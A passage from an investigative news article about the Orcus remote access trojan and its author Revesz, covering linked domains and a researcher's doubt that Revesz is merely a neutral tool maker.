dynamic DNS service has been seen used in connection with malicious botnet activity by another RAT known as Adwind. Indeed, Revesz’s service appears to involve the domain “nullroute[dot]pw”, which is one of 21 domains registered to a “Ciriis Mcgraw,” (as well as orcus[dot]pw and orcusrat[dot]pw). I asked Gallagher (the researcher who originally tipped me off about Revesz’s activities) whether he was persuaded at all by Revesz’s arguments that Orcus was just a tool and that Revesz wasn’t responsible for how it was used. Gallagher said he and his malware researcher friends had private conversations with Revesz in which he seemed to acknowledge that some aspects of the RAT went too far, and promised to release software updates to remove certain objectionable functionalities. But Gallagher said those promises felt more like the actions of someone trying to cover himself. “I constantly try to question my assumptions and make sure I’m playing devil’s advocate and not jumping the gun,” Gallagher said. “But I think he’s well aware that what he’s doing is hurting people, it’s just now he knows he’s under the microscope and trying to do and say enough to cover himself if it ever comes down to him being questioned by law enforcement.” Article source
  • Create New...